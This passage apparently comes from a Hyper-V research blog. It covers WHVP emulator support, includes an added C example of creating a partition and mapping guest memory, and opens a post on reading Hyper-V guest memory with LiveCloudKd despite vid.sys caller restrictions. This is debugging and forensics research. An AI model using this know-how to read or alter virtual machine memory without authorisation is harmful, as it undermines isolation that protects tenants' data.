<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WHVP API usage examples can be seen in: </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/ionescu007/Simpleator" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/ionescu007/Simpleator</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- Simpleator application;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/epakskape/whpexp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/epakskape/whpexp</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- NOP generator from Microsoft (https://en.wikipedia.org/wiki/NOP_slide);</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://crates.io/crates/libwhp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://crates.io/crates/libwhp</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> - </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WHVP Rust-based API;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://github.com/0vercl0k/pywinhv" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/0vercl0k/pywinhv</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - WHVP python-based API.</span></div>
</div>
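<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison with the VirtualBox behaviour described above, here is the minimal WHVP mapping path (partition creation, processor count, setup, winhvplatform!WHvMapGpaRange over a host buffer, one virtual processor). This is an added example, not code from the original post, VirtualBox or Simpleator; the guest address 0x10000 and the 16-page size are constructed values, and the Windows-specific part builds only with WinHvPlatform.h and WinHvPlatform.lib on a host where the Windows Hypervisor Platform is enabled.</span></div>
</div>

```c
#include <stdint.h>
#include <stdio.h>

#define GPA_PAGE_SIZE 4096ULL

/* WHvMapGpaRange only accepts page-granular ranges: the guest physical
 * address and the size must both be multiples of 4 KiB and must not wrap. */
int gpa_range_is_valid(uint64_t gpa, uint64_t size)
{
    if (size == 0 || (gpa % GPA_PAGE_SIZE) != 0 || (size % GPA_PAGE_SIZE) != 0)
        return 0;
    return gpa + size > gpa;            /* reject 64-bit wrap-around */
}

/* Number of 4 KiB guest pages a range covers. */
uint64_t gpa_range_pages(uint64_t size)
{
    return size / GPA_PAGE_SIZE;
}

#ifdef _WIN32
#include <windows.h>
#include <WinHvPlatform.h>
#pragma comment(lib, "WinHvPlatform.lib")

/* Create a one-VP partition and back [gpa, gpa+size) of its guest physical
 * space with host memory. On success the caller owns *partition and *backing;
 * on failure everything is released and the failing HRESULT is returned. */
HRESULT whvp_create_mapped_partition(uint64_t gpa, uint64_t size,
                                     WHV_PARTITION_HANDLE *partition, void **backing)
{
    WHV_CAPABILITY cap;
    WHV_PARTITION_PROPERTY prop;
    WHV_PARTITION_HANDLE h = NULL;
    void *mem = NULL;
    HRESULT hr;

    *partition = NULL;
    *backing = NULL;
    if (!gpa_range_is_valid(gpa, size))
        return E_INVALIDARG;

    /* Refuse early if the Windows Hypervisor Platform is not enabled. */
    hr = WHvGetCapability(WHvCapabilityCodeHypervisorPresent, &cap, sizeof(cap), NULL);
    if (FAILED(hr)) return hr;
    if (!cap.HypervisorPresent) return E_NOTIMPL;

    hr = WHvCreatePartition(&h);
    if (FAILED(hr)) return hr;

    /* The processor count must be set before WHvSetupPartition. */
    ZeroMemory(&prop, sizeof(prop));
    prop.ProcessorCount = 1;
    hr = WHvSetPartitionProperty(h, WHvPartitionPropertyCodeProcessorCount, &prop, sizeof(prop));
    if (SUCCEEDED(hr)) hr = WHvSetupPartition(h);

    /* Host memory that backs the guest range; mapping it is the user-mode call
     * the post pairs with winhvr!WinHvMapGpaPagesSpecial on the kernel side. */
    if (SUCCEEDED(hr)) {
        mem = VirtualAlloc(NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem == NULL) hr = HRESULT_FROM_WIN32(GetLastError());
    }
    if (SUCCEEDED(hr))
        hr = WHvMapGpaRange(h, mem, (WHV_GUEST_PHYSICAL_ADDRESS)gpa, size,
                            WHvMapGpaRangeFlagRead | WHvMapGpaRangeFlagWrite |
                            WHvMapGpaRangeFlagExecute);
    if (SUCCEEDED(hr))
        hr = WHvCreateVirtualProcessor(h, 0, 0);

    if (FAILED(hr)) {
        if (mem) VirtualFree(mem, 0, MEM_RELEASE);
        WHvDeletePartition(h);
        return hr;
    }
    *partition = h;
    *backing = mem;
    return S_OK;
}

int main(void)
{
    WHV_PARTITION_HANDLE h;
    void *mem;
    const uint64_t gpa = 0x10000, size = 16 * GPA_PAGE_SIZE;   /* constructed values */
    HRESULT hr = whvp_create_mapped_partition(gpa, size, &h, &mem);
    if (FAILED(hr)) {
        printf("WHVP setup failed: 0x%08lx\n", (unsigned long)hr);
        return 1;
    }
    printf("mapped %llu guest pages at GPA 0x%llx\n",
           (unsigned long long)gpa_range_pages(size), (unsigned long long)gpa);
    WHvDeleteVirtualProcessor(h, 0);
    WHvUnmapGpaRange(h, gpa, size);
    WHvDeletePartition(h);
    VirtualFree(mem, 0, MEM_RELEASE);
    return 0;
}
#else
int main(void)
{
    /* Non-Windows build: only the range arithmetic is available. */
    printf("valid=%d pages=%llu\n", gpa_range_is_valid(0x1000, 0x10000),
           (unsigned long long)gpa_range_pages(0x10000));
    return 0;
}
#endif
```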
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After adding that algorithm to LiveCloudKd, it became possible to read the memory of all partitions created using the WHVP API. The write operation uses the same algorithm with one difference: the direction of the copy is reversed.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="213" src="https://lh3.googleusercontent.com/b5okXcjWtO_BZ58O5NFPfKjBkYREaq3HPioZOH3YdH0A0Ilh4kimf0lyBEAXLwTDJzelJozeEa-ko-7_4QHLiZCeldFbJHgCCBtKFFngM_dkQdEypJj-EzWTSPLQ0enfyQxpRH4637UpMI2Svg" style="margin-left: 0px; margin-top: 0px;" width="498" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Memory organization for Windows 10 1803 is similar to that of Windows Defender Application Guard\Windows Sandbox containers or Docker containers running in Hyper-V isolation mode.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="407" src="https://lh6.googleusercontent.com/NiC9qPtsRtcJuNco8eBYs7wIQ_pWiKuGGbWcyfTPbjD4ykX-ySMtz87H9bUK4FEIUK1gunCDCuMMYs_4JVglHJjOv6F7ERZSMFEYH9FXBt5WQprGrvee5KztC8vtvNpQTF4DD7IQcX3k2oxrpA" style="margin-left: 0px; margin-top: 0px;" width="489" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Google Android emulator (Qemu-based):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="369" src="https://lh6.googleusercontent.com/CBbp41b27_lv9g1HCIYHG5gyGJ3_fGAy-4cEX-P-I1g6mwzXSpDvWFm142KxeNWbuyBJEr_OJl7Z9fNhSZ23naRUwzAeX2BQZg8IL7IRUHS5Niw9acwyx4R9eyp1J1Viw_QYBup9SS1M0HezaQ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
</div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, we can say that some emulators work successfully with the WHVP API (Qemu, Android), and some haven’t been able to switch to it fully (VirtualBox, VMware). Microsoft clearly doesn’t want to simplify the life of competing products, although there is no direct benefit to Microsoft in this. The performance of virtual operating systems running on these APIs also raises questions. And I think that a documented API for the kernel-mode winhvr.sys could solve this problem.</span></div>
</div>
<div style="text-align: left;">
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-5242916554865778412019-09-10T14:52:00.001-07:002019-10-31T08:46:47.149-07:00Hyper-V memory internals. Guest OS memory access<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Software used in the article (operating systems have August 2019 patches):</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10, build 1903 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2019</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG Preview</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Visual Studio 2019</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Process Hacker</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PyKd plugin for WinDBG</span></div>
</div>
<b id="docs-internal-guid-46578f62-7fff-9791-60ae-82cb6985f3ad" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The testing lab runs on an Intel-based PC. Therefore, Intel-specific Hyper-V terms (hvix64.exe, the vmcall instruction, etc.) are used throughout the article.</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WDAG – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Defender Application Guard;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM (virtual machine)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – a virtual server created in Hyper-V Manager, as distinct from a WDAG container, Windows Sandbox, or Docker in Hyper-V isolation mode;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – the operating system in which the server part of Hyper-V is installed;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – an operating system that runs in the Hyper-V emulation context and uses the virtual devices presented by the Hyper-V infrastructure. It can be a Full VM or a Hyper-V container;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Hypervisor Top-Level Functional Specification 5.0;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPA (guest physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Guest OS physical memory address;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SPA (system physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Root OS physical memory address;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – a hypervisor service function, invoked by executing vmcall with the hypercall number specified;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PFN </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– page frame number.</span></div>
</div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Source code of the hvmm.sys driver on github.com:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/hvmm" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/hvmm</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Python script for parsing GPAR and MBlock objects:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<a href="https://github.com/gerhart01/Hyper-V-Internals/blob/master/ParsePrtnStructure.py" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-Internals/blob/master/ParsePrtnStructure.py</span></a></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It has been a long time since I wrote anything in this blog. That does not mean I stopped Hyper-V research. Since Microsoft shipped WDAG in Windows 10, build 1803, I have been investigating it, and ran into many problems. First, it was impossible to attach a debugger to the container, because the container does not support it: WDAG is an isolated environment, and the bcdedit debugging options cannot be configured. Moreover, every configuration option is reset after a reboot. Sysinternals LiveKD supports attaching to Hyper-V, but its compatibility was broken in the latest OS versions; moreover, the guest OS memory reading hypercall HvReadGpa, which LiveKd uses, is not compatible with containers. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It was a stalemate, but then Matt Suiche (@msuiche), founder of Comae Technologies, shared the LiveCloudKd source code with me (many thanks to him!). That program allows attaching WinDBG to a guest OS, using the vid.dll API to read guest OS memory. But the next problem is that Microsoft blocks vid.dll usage: functions from vid.dll can be executed only from the vmwp.exe process context; otherwise they are blocked by the vid.sys driver, which compares the _EPROCESS object of the function's user-mode caller process with the _EPROCESS of the parent vmwp.exe. Additionally, some of the original LiveCloudKd techniques stopped working in Windows 10, so I had to update those too. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
